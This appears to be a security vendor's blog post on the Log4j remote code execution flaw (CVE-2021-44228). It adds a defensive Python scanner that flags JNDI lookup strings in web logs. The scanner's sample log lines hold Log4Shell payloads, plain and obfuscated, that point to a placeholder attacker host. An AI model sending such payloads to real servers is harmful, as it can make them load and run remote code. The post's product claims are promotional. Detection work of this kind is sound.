On December 9th, the CVE-2021-44228 Apache Log4j RCE was released publicly. Before the threat was made public, Centripetal CleanINTERNET shielded against it proactively, saving our customers valuable time, protecting their reputation and reducing their risk of non-compliance by preventing any compromise associated with this vulnerability. Many organizations are likely to be impacted by this vulnerability without understanding why or how. CleanINTERNET shields 99% of attacks and delivers enterprise-class cyber security to all organizations regardless of size or industry.
Since the release of an initial proof of concept for CVE-2021-44228, Centripetal has witnessed an uptick in reconnaissance-based scanning for this new vulnerability.
Log4j is a Java-based logging utility used by a variety of applications due to its extensibility and ability to output data in standardized formats. It is often included with other applications or devices for use through a localized API.
The vulnerability stems from improper input validation: when malicious input is ingested by the logger, it may result in Remote Code Execution, allowing an attacker to perform actions and run commands on the vulnerable machine. Attackers are commonly installing trojans, cryptocurrency miners and Cobalt Strike beacons, and establishing remote shells for manual access.
Software vendors that use Log4j have begun posting security bulletins notifying clients of their own vulnerability status, and a large number of these have been consolidated into this GitHub Gist. Several tools exist to scan logs for exploitation attempts. Both Fox-IT SRT and Emerging Threats by Proofpoint have released IDS rules to identify exploitation attempts.
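As an added illustration of the kind of log scanning described above (this is example code written for this page, not Centripetal's product nor any of the IDS rule sets named), the scanner below flags Log4j lookup strings in web-server log lines. It goes slightly beyond the text by collapsing nested lookups first, so the obfuscated variants that published detection rules also account for are still caught. The log lines and hostnames are constructed placeholders.

```python
import re

# Nested lookups such as ${lower:j} or ${::-j} are used to hide the literal
# "jndi" token. Collapse them to their plain value before matching, so the
# scanner is not defeated by simple case or default-value tricks.
_NESTED = re.compile(
    r"\$\{(?:lower|upper):([^${}]*)\}"      # ${lower:x} / ${upper:x} -> x
    r"|\$\{[^${}]*:-([^${}]*)\}",           # ${anything:-x}           -> x
    re.IGNORECASE,
)
# Matching is case-insensitive, so we never need to actually apply lower/upper.
_JNDI = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(line: str, max_rounds: int = 10) -> str:
    """Resolve simple nested lookups inside-out until the line stops changing."""
    for _ in range(max_rounds):
        new = _NESTED.sub(
            lambda m: m.group(1) if m.group(1) is not None else m.group(2), line
        )
        if new == line:
            break
        line = new
    return line


def is_exploit_attempt(line: str) -> bool:
    """True when the (de-obfuscated) line carries a JNDI lookup string."""
    return bool(_JNDI.search(normalize(line)))


def scan(lines):
    """Return (1-based line number, line) for every suspicious log line."""
    return [(n, l) for n, l in enumerate(lines, 1) if is_exploit_attempt(l)]


# Constructed sample log lines (not real traffic); attacker.example is a placeholder.
SAMPLE_LOG = [
    '203.0.113.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.7 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '203.0.113.9 - - "GET /?x=1 HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/a}"',
    '203.0.113.11 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/a}"',
    '203.0.113.13 - - "GET /docs/${version} HTTP/1.1" 200 "curl/7.79"',  # benign lookup
]

if __name__ == "__main__":
    for n, line in scan(SAMPLE_LOG):
        print(f"line {n}: {line}")
```

A hit only shows that an exploitation string reached the logger; whether the host was actually vulnerable still has to be confirmed from the Log4j version in use and any outbound LDAP/RMI connections around that time.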